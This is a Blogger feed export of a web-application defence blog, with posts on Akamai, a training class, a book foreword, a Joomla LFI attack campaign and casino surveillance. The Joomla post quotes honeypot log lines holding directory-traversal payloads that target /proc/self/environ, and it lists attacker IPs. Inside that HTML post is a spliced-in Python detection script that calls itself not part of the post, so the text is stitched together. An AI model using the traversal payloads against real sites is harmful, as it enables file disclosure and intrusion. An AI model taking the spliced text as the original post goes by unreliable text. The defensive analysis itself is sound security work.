tag:blogger.com,1999:blog-53615239042375972062024-03-15T21:10:17.145-04:00Tactical Web Application Security<b>Tac-ti-cal</b>: of or relating to combat tactics: of or occurring at the battlefront <<i>a tactical defense</i>>Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.comBlogger68125tag:blogger.com,1999:blog-5361523904237597206.post-31663182506832562822023-07-19T17:01:00.001-04:002023-07-19T17:02:49.438-04:00Eight Year Anniversary at Akamai Blog Reposting - I Once Was Blind but Now I Can See<p> </p><span id="docs-internal-guid-732865d3-7fff-4c6b-42e4-a5991f4675ab"><div style="line-height: 1.2; margin-bottom: 0pt; margin-top: 12pt; text-align: left;">I recently celebrated my eighth work anniversary at Akamai so I thought I would repost this blog post I made shortly after joining Akamai. It is as true today as ever.</div><h1 dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 12pt; text-align: center;"><span face="Calibri, sans-serif" style="color: #2e75b5; font-size: 16pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space-collapse: preserve;">I Once Was Blind but Now I Can See</span></h1><h2 dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 2pt; text-align: center;"><span face="Calibri, sans-serif" style="color: #2e75b5; font-size: 13pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space-collapse: preserve;">CDN-based WAF + Big Data Intelligence is a Gold Mine for This Security Researcher</span></h2><p dir="ltr" style="background-color: white; line-height: 2.16; margin-bottom: 0pt; margin-top: 0pt; padding: 0pt 0pt 19pt;"><span face="Ubuntu, sans-serif" style="background-color: transparent; color: #3a444a; font-size: 10.5pt; font-style: italic; font-variant-alternates: normal; font-variant-east-asian: 
normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space-collapse: preserve;">CDN-based WAF + Big Data Intelligence is a Gold Mine for This Security Researcher</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span face="Calibri, sans-serif" style="font-size: 12pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">I am frequently asked by friends and colleagues why I joined Akamai's Threat Research Team. I can boil it down to three main reasons: </span><span face="Calibri, sans-serif" style="font-size: 12pt; font-style: italic; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space-collapse: preserve;">People, Technology and Data</span><span face="Calibri, sans-serif" style="font-size: 12pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">. </span></p><br /><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span face="Calibri, sans-serif" style="font-size: 12pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">The first reason is </span><span face="Calibri, sans-serif" style="font-size: 12pt; font-style: italic; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space-collapse: preserve;">people</span><span face="Calibri, sans-serif" style="font-size: 12pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">. Don't get me wrong. 
This is not a slight on my former colleagues. They were all great. The fact is that, for me, I was missing being stimulated and challenged by other web application defense security researchers that live and breathe web application threats. I found it here in Akamai's Threat Research Team. At the top of that list is Ory Segal. Ory and I have known each other for years going back to our time as board members for the Web Application Security Consortium (WASC). We have some similar backgrounds with regards to leading WAF and DAST research teams and we had always toyed with the idea of someday working together. Well, that day finally came last June. It is exciting for me to work with Ory and to try and tackle these challenging web application security issues. Besides Ory, there are also many other talented security researchers on the team and I want to mention two of them specifically. Or Katz was an old colleague of mine from Breach Security days and I am glad to work with him again. He excels at taking a larger view of our dataset and identifying attack patterns and new malicious campaigns. Ezra Caltum has also been awesome to work with. We share a common bond that can only be understood after going through the fires of having to create and maintain large scale WAF signatures! The excellence of people does not end there and extends outside of the Threat Research Team. The engineers in charge of the Ghost platform are incredible and the management team is dynamic and forward thinking. All in all, it is a fantastic group of people to work with. 
</span></p><br /><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span face="Calibri, sans-serif" style="font-size: 12pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">The second reason I joined Akamai is the </span><span face="Calibri, sans-serif" style="font-size: 12pt; font-style: italic; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space-collapse: preserve;">technology</span><span face="Calibri, sans-serif" style="font-size: 12pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">. My main area of research focus is the Kona Security product line, including the WAF. I have spent more than a decade working with both open source (ModSecurity) and commercial (Breach Security/Trustwave) WAFs. From a security researcher's perspective, one of the largest issues I had was a lack of visibility. The main challenge was with the traditional drop-ship WAF-in-a-box model. We would sell WAF servers to customers and then we would never see any actual data from them unless there was a false positive problem. This lack of real-time alert data was very frustrating. How was I supposed to verify that the protection logic was working? How was I supposed to identify new attack techniques and trends without access to real data? I tried to make do by utilizing web honeypot systems, and they did provide some level of value, but nothing can compare to the real thing. This situation made me very envious of CDN/Cloud-based WAFs. Now this is the way to go! There are many advantages to this deployment model. This model is more agile from a security perspective. What if there is a new 0-day vulnerability or some new attack tool that is released? 
How quickly can your WAF vendor respond and get protections out to customers? With a cloud-based WAF, that time-to-respond metric is much lower than with drop-ship WAFs. </span></p><br /><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span face="Calibri, sans-serif" style="font-size: 12pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">The final reason that I joined Akamai is access to </span><span face="Calibri, sans-serif" style="font-size: 12pt; font-style: italic; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space-collapse: preserve;">data</span><span face="Calibri, sans-serif" style="font-size: 12pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">. Data is gold to security researchers, and here at Akamai we have the mother lode of data in our Cloud Security Intelligence (CSI) big data platform. CSI holds more than 4 petabytes of intelligence data. For me, when I used to be starving for any scraps of web attack data to feed on, getting access to CSI data is like the all-you-can-eat buffet! Now I am able to see attacks that span across multiple customer domains, track botnets that are part of DDoS campaigns and even attackers attempting to validate stolen login credentials. 
</span><span face="Calibri, sans-serif" style="font-size: 12pt; font-style: italic; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space-collapse: preserve;">Once I was blind but now I can see</span><span face="Calibri, sans-serif" style="font-size: 12pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">... And I am loving every minute of it! </span></p><br /><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span face="Calibri, sans-serif" style="font-size: 12pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">So, what does all this mean to you? If you were a fan of my previous web application security/defense posts on the Trustwave SpiderLabs blog, then you are going to be happy because I am planning to start blogging again here on the Akamai blog. It took me a while to ramp up here and to finish work on some high priority goals but I am now ready to get back to blogging. Gotta run for now though as there is a distributed SQL Injection botnet I have to analyze! </span></p><div><span face="Calibri, sans-serif" style="font-size: 12pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><br /></span></div></span>Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.com0tag:blogger.com,1999:blog-5361523904237597206.post-60645595399071289472014-02-19T09:04:00.002-05:002014-02-19T09:04:31.031-05:00New 4-day "Web Application Defender Cookbook LIVE" class at BlackhatUSA 2014<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-y9MYCckK9p4/UwS0iq9kxvI/AAAAAAAAATI/p-GkeaJuJ5o/s1600/Screen+Shot+2014-02-19+at+8.40.05+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-y9MYCckK9p4/UwS0iq9kxvI/AAAAAAAAATI/p-GkeaJuJ5o/s1600/Screen+Shot+2014-02-19+at+8.40.05+AM.png" height="387" width="640" /></a></div>
<br />
<a href="https://www.blackhat.com/us-14/training/web-application-defenders-cookbook-live.html" target="_blank">Registration is now OPEN</a> for my new, updated class based on <a href="http://www.amazon.com/Web-Application-Defenders-Cookbook-Protecting/dp/1118362187" target="_blank">my book</a>. Here are some comments from past students who participated in the 2-day version of the class at the recent <a href="http://2013.appsecusa.org/2013/training/index.html" target="_blank">OWASP AppSecUSA 2013 conference</a> in New York:<br />
<br />
<br />
<ul>
<li><span style="color: #333333;"><span style="font-family: inherit;"><i>I learned more in 2 days than I would have in weeks on my own. The class was definitely worth it. Ryan
Barnett is a great educator, and an amazing security resource. </i></span></span></li>
<li><span style="color: #333333;"><span style="font-family: inherit;"><i>It will take me some time to process all of the valuable information and am glad I was able to walk
away with his book!</i></span></span></li>
<li><span style="color: #333333;"><span style="font-family: inherit;"><i>I liked learning about different threats to a web application and how I can see them. I liked that the
class had extensive labs, and some higher level content.</i></span></span></li>
<li><span style="color: #333333;"><span style="font-family: inherit;"><i>I enjoyed the hands on labs and the self paced nature of the entire course.</i></span></span></li>
<li><i>I’m glad I chose your class instead. The material was presented clearly and it was great working through the examples with you available for answering questions. I was really happy with the ratio of lecture to labs. It gave us a good amount of hands-on time. Also, besides having the book as a take-away, we had VMs to look at and work through once back at our office. I can immediately put to use what I learned in the class. My only issue was having the length of the class be only 2 days. I would assume it was a constraint of the conference schedule. If the class could be expanded to 3 or 4 days, it would be fantastic. I really appreciated your relaxed teaching style and eagerness to answer our questions.</i></li>
</ul>
<br />
<br />
Hope to see you all in Las Vegas!<br />
<br />Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.com0tag:blogger.com,1999:blog-5361523904237597206.post-60922295230565076762012-12-04T10:19:00.002-05:002012-12-04T10:32:15.652-05:00My New Book: The Web Application Defender's CookbookI am excited to announce that my new book entitled "<a href="http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118362187.html" target="_blank">The Web Application Defender's Cookbook: Battling Hackers and Defending Users</a>" is now available for purchase! This book is a culmination of many years of defending both government and commercial web applications. Just to be clear, this is not a "WAF" book. Yes, I utilized the open source ModSecurity WAF tool for examples however the techniques used within the book could be implemented through other technical means such as implementing <a href="https://www.owasp.org/index.php/Category:OWASP_AppSensor_Project" target="_blank">OWASP AppSensor Detection Points</a> within the application itself.<br />
<br />
<br />
<div class="p1">
<a href="http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118362187.html" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="200" src="http://4.bp.blogspot.com/-f0Z8zQyTAIE/UL4Kk_CPA-I/AAAAAAAAAQA/79M0xK-2_wo/s200/book-cover.png" width="157" /></a>Quite simply, the goal of this book is <i><b>to make your web applications more difficult to hack</b></i>. Web applications—or any software, for that matter—will never be completely secure and free from defects. It is only a matter of time before a determined attacker will find some vulnerability or misconfiguration to exploit and compromise either your site or one of its users. You should take a moment to come to terms with this truth before progressing. Many people wrongly assume that hiring “smart” developers or deploying commercial security products will magically make their sites “hacker proof.” Sadly, this is not reality. A more realistic goal for web application security is to gain visibility into your web transactions and to make your web applications more <i><b>hacker resistant</b></i>. If you can force any would-be attackers to spend a significant amount of time probing your site, looking for vulnerabilities, you will widen the window of opportunity for operational security personnel to initiate proper response methods.</div>
<div class="p1">
<br /></div>
<div class="p1">
This book arms you with information that will help you increase your web applications’ resistance to attacks. You will be able to perform the following critical web defensive techniques:</div>
<div class="p1">
</div>
<ul>
<li>Implement full HTTP auditing for incident response.</li>
<li>Utilize a process to mitigate identified vulnerabilities.</li>
<li>Deploy web tripwires (honeytraps) to identify malicious users.</li>
<li>Detect when users are acting abnormally.</li>
<li>Analyze uploaded files and web content for malware.</li>
<li>Recognize when web applications leak sensitive user or technical data.</li>
<li>Respond to attacks with varying levels of force.</li>
</ul>
<br />
<div class="p1">
Here is the Foreword from the book which was written by my friend <a href="https://twitter.com/jeremiahg" target="_blank">Jeremiah Grossman</a>:</div>
<br />
<blockquote>
<i>A defender, the person responsible for protecting IT systems from being compromised, could just as easily be the first line of defense as the last line. In fact, a defender working for an average organization might be the only line of defense—the only thing standing between the bad guy and a headline-making data breach. Worse yet, perhaps the incident doesn’t make headlines, and no one, including the defender, is the wiser.</i> </blockquote>
<blockquote>
<i>Either way, when whatever crazy new Web 2.0 Ajax-laced HTML5-laden application has traversed the software development life cycle and successfully made it past the QA gate, when the third-party penetration testers are long gone, after management has signed off on all the security exceptions, and the application has been released to production, with or without the defender’s knowledge or consent, “security” then becomes entirely the defender’s responsibility. Rest assured that vulnerabilities will remain or will be introduced eventually. So, when all is said and done, a defender’s mission is to secure the insecure, to identify incoming attacks and thwart them, and to detect and contain breaches.</i> </blockquote>
<blockquote>
<i>That’s why there should be no doubt about the importance of the role of a defender. Defenders often safeguard the personal data of millions of people. They may protect millions, perhaps billions, of dollars in online transactions and the core intellectual property of the entire business. You can bet that with so much on the line, with so much valuable information being stored, someone will want to steal it. And the bigger and more high profile the system, the more sustained and targeted the incoming attacks will be.</i> </blockquote>
<blockquote>
<i>Making matters even more challenging, the bad guys have the luxury of picking their shots. They may attack a system whenever they want to, or not. A Defender’s job is 24/7/365, holidays, weekends, vacation days. The system must be ready, and the defender must be ready, at all times.</i> </blockquote>
<blockquote>
<i>A defender’s job description could read much like Ernest Shackleton’s famous advertisement when he was looking for men to accompany him on his next Antarctic expedition:</i> </blockquote>
<blockquote>
<b><i>Men wanted for hazardous journey. Low wages, bitter cold, long hours of complete darkness. Safe return doubtful. Honour and recognition in event of success.</i> </b></blockquote>
<blockquote>
<i>A defender’s success really comes down to understanding a few key points about the operational environment in which he or she works:</i><br />
<ul>
<li><i>Web sites are often deployed in such a way that they cannot be adequately mirrored in development, QA, or even staging. This means that the real and true security posture, the real and true risk to the business, can be fully grasped only when it hits production and becomes an actual risk. As such, defenders must be able to think on their feet, be nimble, and react quickly.</i></li>
</ul>
<ul>
<li><i>Defenders will find themselves responsible for protecting web sites they did not create and have little or no insight into or control over. Management may not respect security and may be unwilling to fix identified vulnerabilities in a timely fashion, and that could be the long-term standard operating procedure. And maybe this is the right call, depending on business risk and the estimated cost of software security. Whatever the case may be, defenders must be able to identify incoming attacks, block as many exploits as they can, and contain breaches.</i></li>
</ul>
<ul>
<li><i>Fighting fires and responding to daily threats must be an expected part of the role. Whether the business is fully committed to software security is immaterial, because software will always have vulnerabilities. Furthermore, everyone gets attacked eventually. A defender never wants to be late in seeing an attack and the last one to know about a breach. For a defender, attack identification and response time are crucial.</i></li>
</ul>
<ul>
<li><i>Defenders, because they are on the front lines, learn a tremendous amount about the application’s risk profile and the necessary security readiness required to thwart attackers. This intelligence is like gold when communicated to developers who are interested in creating ever more resilient systems. This intelligence is also like gold when informing the security assessment teams about what types of vulnerabilities they should focus on first when testing systems in either QA or production. Everyone needs actionable data. The best defenders have it.</i></li>
</ul>
<i>Putting these practices to use requires specialized skills and experience. Normally, aspiring defenders don’t get this type of how-to instruction from product README files or FAQs. Historically, the knowledge came from conversations with peers, blog posts, and mailing list conversations. Information scattered around the Internet is hard to cobble together into anything actionable. By the time you do, you might already have been hacked. Maybe that’s why you picked up this book. Clearly web-based attackers are becoming more active and brazen every day, with no signs of slowing.</i> </blockquote>
<blockquote>
<i>For a Defender to be successful, there is simply no substitute for experience. And this kind of experience comes only from hour after hour, day after day, and year after year of being on the battlefield, learning what strategies and tactics work in a given situation. This kind of experience certainly doesn’t come quickly or easily. At the same time, this kind of information and the lessons learned can be documented, codified, and shared. This is what Ryan Barnett offers in this book: recipes for defense—recipes for success.</i> </blockquote>
<blockquote>
<i>To all defenders, I leave you in Ryan’s accomplished and capable hands. His reputation speaks for itself. Ryan is one of the original defenders. He has contributed more than anyone else in web security to define the role of the defender. And he’s one of the best field practitioners I’ve ever seen. Good luck out there!</i> </blockquote>
<blockquote>
<i>Jeremiah Grossman<br />Chief Technology Officer, WhiteHat Security, Inc.</i></blockquote>
Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.com1tag:blogger.com,1999:blog-5361523904237597206.post-21892835035391760602011-11-18T11:46:00.003-05:002012-01-25T10:52:43.643-05:00Mass Joomla Component LFI Attacks Identified<h1>Joomla Component LFI Vulnerabilities</h1><p>Joomla has hundreds of Controller components. Check out the <a href="http://extensions.joomla.org/" target="_self">Joomla Extension site</a> for examples. Unfortunately, the vast majority of these components have LFI vulnerabilities. The vulnerability details are pretty much the same -</p><ul><li>The vulnerable page is "index.php".</li><br /><li>The "option" parameter is set to "com_xxxxxx" where xxxx is the vulnerable component name.</li><br /><li>Input passed via the "controller" parameter is not properly verified before being used to include files. </li><br /><li>By appending URL-encoded NULL bytes, an attacker can specify any arbitrary local file.</li><br /></ul><p>Here is an example <a href="http://osvdb.org/search/search?search%5Bvuln_title%5D=Joomla+Controller+Parameter+Traversal+Local+File+Inclusion&search%5Btext_type%5D=alltext" target="_self">OSVDB Search Query for a listing of these vulnerabilities</a>.</p><p><a href="http://npercoco.typepad.com/.a/6a0133f264aa62970b0153932f4111970b-pi"><img title="Screen shot 2011-11-17 at 10.27.01 AM" src="http://npercoco.typepad.com/.a/6a0133f264aa62970b0153932f4111970b-800wi" border="0" width="85%" height="85%" alt="Screen shot 2011-11-17 at 10.27.01 AM" /></a></p><h1>Honeypot Attack Probes Identified</h1><p>Our daily honeypot analysis has identified a mass scanning campaign aimed at various Joomla Component Local File Inclusion (LFI) Vulnerabilities. 
Here are a few example attacks taken from today's honeypot logs:</p><pre>109.75.169.20 - - [17/Nov/2011:17:48:15 +0900] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ00 HTTP/1.1" 404 224<br />174.122.220.10 - - [17/Nov/2011:00:21:32 +0100] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../..//proc/self/environ00 HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"<br />72.47.211.229 - - [17/Nov/2011:10:14:27 +0900] "GET /index.php?option=com_cvmaker&controller=../../../../../../../../../../../../..//proc/self/environ00 HTTP/1.1" 404 216<br />180.235.131.131 - - [17/Nov/2011:01:34:54 +0900] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../..//proc/self/environ00 HTTP/1.1" 404 222</pre><p>Notice that various components are targeted in the "option" parameter and that a directory traversal attack is used in the "controller" parameter. 
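That pattern (a com_* value in "option" plus a traversal payload in "controller") is easy to pick out of ordinary web server access logs. The following script is an added example written for this post, not code from the post, Trustwave or OWASP: it parses Apache-style log lines, URL-decodes the controller value (including double-encoded payloads), flags the Joomla controller LFI pattern and produces the same attack count, unique-source count and targeted-component list that the statistics in this post report. The log lines and IP addresses it contains are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, unquote, urlsplit

# Apache common/combined log prefix: client IP, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log lines modelled on the honeypot entries above.
# Documentation-range IPs only; the third line carries a double-encoded payload.
SAMPLE_LOG = """\
192.0.2.10 - - [17/Nov/2011:17:48:15 +0900] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 224
192.0.2.10 - - [17/Nov/2011:17:48:16 +0900] "GET /index.php?option=com_ckforms&controller=../../../../../..//proc/self/environ%00 HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
198.51.100.7 - - [17/Nov/2011:10:14:27 +0900] "GET /index.php?option=com_cvmaker&controller=..%252f..%252f..%252fetc%252fpasswd%2500 HTTP/1.1" 404 216
203.0.113.5 - - [17/Nov/2011:11:02:03 +0900] "GET /index.php?option=com_content&view=article&controller=article&id=42 HTTP/1.1" 200 5120
203.0.113.5 - - [17/Nov/2011:11:02:04 +0900] "GET /images/logo.png HTTP/1.1" 200 812
"""


def fully_decode(value, max_rounds=3):
    """Undo repeated URL encoding (e.g. %252e%252e%252f) up to max_rounds times."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_line(line):
    """Split one access-log line into fields; return None if it is not a log line."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qs already decodes one layer of %XX encoding
    rec["query"] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def classify(rec):
    """Return a finding dict if the request matches the Joomla controller LFI pattern, else None."""
    if not rec["path"].endswith("/index.php"):
        return None
    option = rec["query"].get("option", [""])[0]
    if not option.startswith("com_"):
        return None
    for raw in rec["query"].get("controller", []):
        # second decode round catches double-encoded payloads; normalise backslashes
        ctrl = fully_decode(raw).replace("\\", "/")
        reasons = []
        if "../" in ctrl:
            reasons.append("directory traversal")
        if "\x00" in ctrl:
            reasons.append("null byte")
        if reasons:
            return {
                "ip": rec["ip"],
                "component": option,
                "reason": ", ".join(reasons),
                # the file the include would reach, traversal prefix and NUL suffix removed
                "file": ctrl.split("\x00", 1)[0].lstrip("./"),
            }
    return None


def analyze(lines):
    """Run the detection over log lines and aggregate like the post's statistics section."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        finding = classify(rec)
        if finding is not None:
            hits.append(finding)
    return {
        "attacks": len(hits),
        "unique_sources": len({h["ip"] for h in hits}),
        "by_source": Counter(h["ip"] for h in hits),
        "components": sorted({h["component"] for h in hits}),
        "hits": hits,
    }


if __name__ == "__main__":
    report = analyze(SAMPLE_LOG.splitlines())
    print(f"attacks: {report['attacks']}, unique sources: {report['unique_sources']}")
    for ip, count in report["by_source"].most_common():
        print(f"{count:>5} {ip}")
    for hit in report["hits"]:
        print(f"{hit['ip']} {hit['component']} -> {hit['file']} ({hit['reason']})")
```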
The file these requests try to include, /proc/self/environ, exposes the environment variables of the web server process, which is the OS environment data the probes are after.</p><h2>Attack Statistics</h2><ul><li>Number of attacks seen: 1538</li><br /><li>Number of unique attack sources: 45</li></ul><h2>Top 25 Joomla Component LFI Attacker Sources</h2><br /><table><tbody><tr><th># of Attacks</th><th>IP Address</th><th>Country Code</th><th>Country Name</th><th>Region</th><th>Region Name</th><th>City</th></tr><tr><td>491</td><td>180.235.131.131</td><td>AU</td><td>Australia</td><td> </td><td> </td><td> </td></tr><tr><td>95</td><td>210.173.154.35</td><td>JP</td><td>Japan</td><td> </td><td> </td><td> </td></tr><tr><td>86</td><td>74.50.25.165</td><td>US</td><td>United States</td><td>CA</td><td>California</td><td>Anaheim</td></tr><tr><td>80</td><td>91.121.87.48</td><td>FR</td><td>France</td><td> </td><td> </td><td> </td></tr><tr><td>67</td><td>69.27.109.40</td><td>CA</td><td>Canada</td><td>SK</td><td>Saskatchewan</td><td>Saskatoon</td></tr><tr><td>58</td><td>46.105.98.146</td><td>FR</td><td>France</td><td> </td><td> </td><td> </td></tr><tr><td>58</td><td>180.151.1.68</td><td>IN</td><td>India</td><td>07</td><td>Delhi</td><td>New Delhi</td></tr><tr><td>51</td><td>67.23.229.237</td><td>US</td><td>United States</td><td>NY</td><td>New York</td><td>New York</td></tr><tr><td>42</td><td>64.92.125.26</td><td>US</td><td>United States</td><td>CO</td><td>Colorado</td><td>Denver</td></tr><tr><td>42</td><td>182.255.0.200</td><td>ID</td><td>Indonesia</td><td> </td><td> </td><td> </td></tr><tr><td>39</td><td>82.192.87.86</td><td>NL</td><td>Netherlands</td><td>07</td><td>Noord-Holland</td><td>Amsterdam</td></tr><tr><td>38</td><td>174.122.220.10</td><td>US</td><td>United States</td><td>TX</td><td>Texas</td><td>Houston</td></tr><tr><td>37</td><td>178.162.231.59</td><td>CA</td><td>Canada</td><td> </td><td> </td><td> </td></tr><tr><td>36</td><td>72.47.211.229</td><td>US</td><td>United States</td><td>CA</td><td>California</td><td>Culver 
City</td></tr><tr><td>33</td><td>122.201.80.95</td><td>AU</td><td>Australia</td><td>02</td><td>New South Wales</td><td>Sydney</td></tr><tr><td>32</td><td>174.37.16.78</td><td>US</td><td>United States</td><td>TX</td><td>Texas</td><td>Dallas</td></tr><tr><td>31</td><td>64.13.224.234</td><td>US</td><td>United States</td><td>CA</td><td>California</td><td>Culver City</td></tr><tr><td>27</td><td>109.75.169.20</td><td>GB</td><td>United Kingdom</td><td> </td><td> </td><td> </td></tr><tr><td>25</td><td>65.98.23.170</td><td>US</td><td>United States</td><td>CA</td><td>California</td><td>San Francisco</td></tr><tr><td>25</td><td>46.20.45.50</td><td>DE</td><td>Germany</td><td> </td><td> </td><td> </td></tr><tr><td>24</td><td>193.106.93.131</td><td>RU</td><td>Russian Federation</td><td> </td><td> </td><td> </td></tr><tr><td>16</td><td>85.36.63.35</td><td>IT</td><td>Italy</td><td> </td><td> </td><td> </td></tr><tr><td>11</td><td>71.17.4.161</td><td>CA</td><td>Canada</td><td>SK</td><td>Saskatchewan</td><td>Lloydminster</td></tr><tr><td>10</td><td>50.73.66.4</td><td>US</td><td>United States</td><td> </td><td> </td><td> </td></tr><tr><td>9</td><td>173.245.78.42</td><td>US</td><td>United States</td><td>CA</td><td>California</td><td>Fremont</td></tr><tr><td>8</td><td>92.60.124.128</td><td>ES</td><td>Spain</td><td> </td><td> </td><td><br /><br /></td></tr></tbody></table><br /><h2>Joomla Components Targeted</h2><p>Here is a listing of the various Joomla components that were targeted in today's attacks:</p><pre>com_bca-rss-syndicator<br />com_ccnewsletter<br />com_ckforms<br />com_cvmaker<br />com_datafeeds<br />com_dioneformwizard<br />com_dwgraphs<br />com_fabrik<br />com_gadgetfactory<br />com_ganalytics<br />com_gcalendar<br />com_hsconfig<br />com_if_surfalert<br />com_janews<br />com_jfeedback<br />com_joomlapicasa2<br />com_joomlaupdater<br />com_joommail<br />com_jshopping<br />com_juliaportfolio<br />com_jvehicles<br />com_jwhmcs<br />com_linkr<br />com_mediqna<br 
/>com_mmsblog<br />com_mscomment<br />com_mtfireeagle<br />com_ninjarsssyndicator<br />com_onlineexam<br />com_orgchart<br />com_pcchess<br />com_properties<br />com_rokdownloads<br />com_rpx<br />com_s5clanroster<br />com_sbsfile<br />com_sectionex<br />com_shoutbox<br />com_simpledownload<br />com_smestorage<br />com_spsnewsletter<br />com_svmap<br />com_sweetykeeper<br />com_userstatus<br />com_webeecomment<br />com_weberpcustomer<br />com_zimbcomment</pre><h1>Recommendations</h1><p>If you are running Joomla applications, you should ensure that you are keeping up-to-date on patches and updates.</p><h2>OWASP Joomla Vulnerability Scanner</h2><p>OWASP has an open source <a href="https://www.owasp.org/index.php/Category:OWASP_Joomla_Vulnerability_Scanner_Project" target="_self">Joomla Vulnerability Scanner Project</a> that you should check out and run against your site.</p><h2>OWASP ModSecurity Core Rule Set</h2><p>The <a href="https://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project" target="_self">OWASP ModSecurity CRS</a> includes generic directory traversal attack detections which should provide base level protections.</p><h2>Commercial ModSecurity Rules From Trustwave</h2><p>We have numerous virtual patches for Joomla applications including these Controller parameter LFI attacks in our <a href="http://www.modsecurity.org/projects/commercial/rules/" target="_self">commercial rules feed</a>.</p>Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.com0tag:blogger.com,1999:blog-5361523904237597206.post-71258018001123657342011-08-07T01:06:00.000-04:002011-08-07T03:23:17.836-04:00What Web Application Security Monitoring Can Learn From Casino Surveillance<a href="http://photos.pokerplayer.co.uk/images/front_picture_library_UK/dir_4/total_gambler_2376_15.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><blockquote></blockquote><img style="float:right; margin:0 0 10px 10px;cursor:pointer; 
cursor:hand;width: 428px; height: 285px;" src="http://photos.pokerplayer.co.uk/images/front_picture_library_UK/dir_4/total_gambler_2376_15.jpg" border="0" alt="" /></a><div>After spending this week at the Blackhat/DefCon 19 conferences, I was struck with this thought - Web application security monitoring could take a few pointers from Casino Surveillance.
<br />
<br /><span style="font-weight: bold;">Network Security and Banks</span>
<br />Traditional network security has a security posture philosophy similar to that of brick-and-mortar banks: <span style="font-weight: bold;">keep the bad guys out.</span> For banks, the goal is to keep the money in the vault and make sure that criminals cannot get at it. Network security similarly aims to keep outsiders from reaching internal systems and ports.</div><div>
